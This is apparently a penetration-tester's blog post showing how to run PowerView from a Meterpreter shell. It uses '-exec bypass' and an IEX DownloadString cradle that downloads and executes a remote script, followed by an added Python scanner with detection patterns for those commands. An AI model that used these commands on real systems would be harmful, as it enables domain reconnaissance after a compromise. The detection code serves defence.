Old post on the subject here:
http://carnal0wnage.attackresearch.com/2012/10/run-powershell-module-in-meterpreter.html
More recent posts on the subject by harmj0y:
http://www.harmj0y.net/blog/powershell/derbycon-powershell-weaponization/
Anyway, #2 from The PowerShell Weaponization Problem works OK if you don't mind the code being on disk.
Gist with the command
meterpreter > shell
Process 2380 created.
Channel 4 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\user\Desktop>powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\user\Desktop\PowerTools\PowerView\powerview.ps1'; Get-NetDomain}"
powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\user\Desktop\PowerTools\PowerView\powerview.ps1'; Get-NetDomain}"
UNLUCKYCOMPANY.COM
C:\Users\user\Desktop>
Via the IEX download method. Gist with the command:
C:\Users\user\Desktop>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1'); Get-NetDomain"
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1'); Get-NetDomain"
UNLUCKYCOMPANY.COM
C:\Users\user\Desktop>
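As an added defensive example (not from the post): a small Python scanner that flags the two launch patterns shown above, the -exec bypass switch combined with a script import from a user profile path, and the IEX/DownloadString cradle, in constructed process-creation records of the form timestamp|host|parent_image|command_line. The sample records are made up; the record format and indicator names are assumptions, not any product's schema.

```python
import re

# Indicator patterns for the two launch styles in the post. PowerShell accepts
# abbreviated parameter names, so "-exec bypass" and "-ep bypass" both mean
# "-ExecutionPolicy Bypass".
INDICATORS = {
    "execution-policy-bypass": re.compile(r"-(?:ex\w*|ep)\s+bypass", re.I),
    "download-cradle": re.compile(
        r"(?:iex|invoke-expression)\b.*(?:downloadstring|downloaddata|net\.webclient)",
        re.I | re.S),
    "module-import-from-user-path": re.compile(
        r"import-module\s+['\"]?[a-z]:\\users\\", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)

def classify_powershell_cmdline(cmdline):
    """Return indicator names matching one PowerShell command line, plus any
    embedded URL (handy for pivoting to proxy logs)."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    return {"indicators": hits, "urls": URL_RE.findall(cmdline)}

def scan_process_log(lines):
    """Scan constructed process-creation records of the form
    'timestamp|host|parent_image|command_line' and return suspicious ones.
    The parent is recorded because the post launches PowerShell from cmd.exe."""
    flagged = []
    for line in lines:
        ts, host, parent, cmdline = line.split("|", 3)
        if "powershell" not in cmdline.lower():
            continue
        result = classify_powershell_cmdline(cmdline)
        if result["indicators"]:
            result.update(time=ts, host=host,
                          parent_is_cmd=parent.lower().endswith("cmd.exe"))
            flagged.append(result)
    return flagged

# Constructed sample records (not real telemetry): the two launch styles from
# the post and one benign administrative invocation.
SAMPLE_LOG = [
    "2015-10-01T10:00:01|WS01|C:\\Windows\\System32\\cmd.exe|"
    "powershell.exe -exec bypass -Command \"& {Import-Module "
    "'C:\\Users\\user\\Desktop\\PowerTools\\PowerView\\powerview.ps1'; Get-NetDomain}\"",
    "2015-10-01T10:00:02|WS01|C:\\Windows\\System32\\cmd.exe|"
    "powershell.exe -exec bypass -Command \"IEX (New-Object Net.WebClient)"
    ".DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1'); Get-NetDomain\"",
    "2015-10-01T10:00:03|WS01|C:\\Windows\\explorer.exe|"
    "powershell.exe -NoProfile -Command \"Get-Service | Where-Object Status -eq 'Running'\"",
]
```

Running scan_process_log(SAMPLE_LOG) returns the first two records with their indicators and the extracted URL, and leaves the Get-Service invocation alone.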